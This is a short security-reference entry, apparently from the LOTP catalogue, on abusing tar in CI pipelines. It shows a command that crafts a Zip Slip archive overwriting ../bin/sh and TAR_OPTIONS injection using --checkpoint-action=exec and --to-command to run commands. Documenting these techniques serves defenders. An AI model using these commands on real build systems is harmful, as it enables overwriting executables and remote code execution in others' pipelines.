LOTP
tar
References
tar is a widely used archiver.
Zip Slip
If tar uses -P or --absolute-names, it is vulnerable to Zip Slip, where a malicious archive can overwrite files in any parent directories. It can be used to:
- Poison the source code
- Replace an executable or a config file which can lead to RCE
To create a malicious archive:
tar cPf zipslip.tar ../../../../../../bin/sh
Vulnerable scenario:
tar xPf zipslip.tar
Environnement variable
tar prepend TAR_OPTIONS env variable to every call. Quotes in the TAR_OPTIONS cause a buffer overflow. A workaround is to escape spaces with backslash. See Using tar Options. If the environment variable of a CI can be poison, TAR_OPTIONS can lead to RCE via:
export TAR_OPTIONS="--checkpoint=1 --checkpoint-action=exec=echo\ hello\ world"
tar cf test.tar empty.txt # Any tar command
export TAR_OPTIONS='--to-command=echo\ test' # Only works with extraction
tar xf test.tar # Every file will be sent to the command